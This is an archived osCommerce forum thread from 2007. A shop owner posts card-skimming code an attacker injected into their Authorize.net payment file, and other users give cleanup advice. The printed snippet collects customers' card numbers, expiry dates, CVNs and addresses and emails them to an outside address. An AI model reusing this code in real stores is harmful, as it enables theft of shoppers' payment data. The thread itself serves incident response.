Sadtra Posted November 3, 2007 Posted November 3, 2007 Running osCommerce 2.2-MS2... Here is the code that is added to my authorize.php file (I upload and this hack keeps returning and only the report e-mail to address changes : // build report $report = 'Date: ' . date("D M j G:i:s Y"); $report .= "--" . 'Name: ' . $order->billing['firstname'] . ' ' . $order->billing['lastname']; $report .= "--" . 'Number: ' . $this->cc_card_number; $report .= "--" . 'Exp: ' . $this->cc_expiry_month . '/' . substr($this->cc_expiry_year, -2); $report .= "--" . 'CVN: ' . $this->cc_card_verify; $report .= "--" . 'Email: ' . $mail; $report .= "--" . 'Address:' . $order->billing['street_address'] . ' City: ' . $order->billing['city'] . ' State: ' . $order->billing['state'] . ' Code: ' . $order->billing['postcode']; $report .= "--" . 'Phone: ' . $order->customer['telephone'] . ' Country: ' . $order->billing['country']['title']; // mail report tep_mail('BMT', '[email protected]', '[ REPORT ] CCV notary', stripslashes($report),'', $mail); if (MODULE_PAYMENT_AUTHORIZENET_TESTMODE == 'Test') $process_button_string .= tep_draw_hidden_field('x_Test_Request', 'TRUE'); $process_button_string .= tep_draw_hidden_field(tep_session_name(), tep_session_id());
germ Posted November 3, 2007 Posted November 3, 2007 Change all your passwords (your control panel, osCommerce admin, any .htaccess passwords). After you upload the fixed version of the hacked file, set the permissions to 444 (read-only for everyone). Report the hack to your host as the server may be hacked, and nothing you do will help if that's the case. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
♥Vger Posted November 3, 2007 Posted November 3, 2007 I've seen this happening quite a bit recently, and not just with A Net. It IS down to either lax site security or servers being compromised. My best guess is the server control panel - and I'd also bet it's another cPanel exploit. Vger
Recommended Posts
Archived
This topic is now archived and is closed to further replies.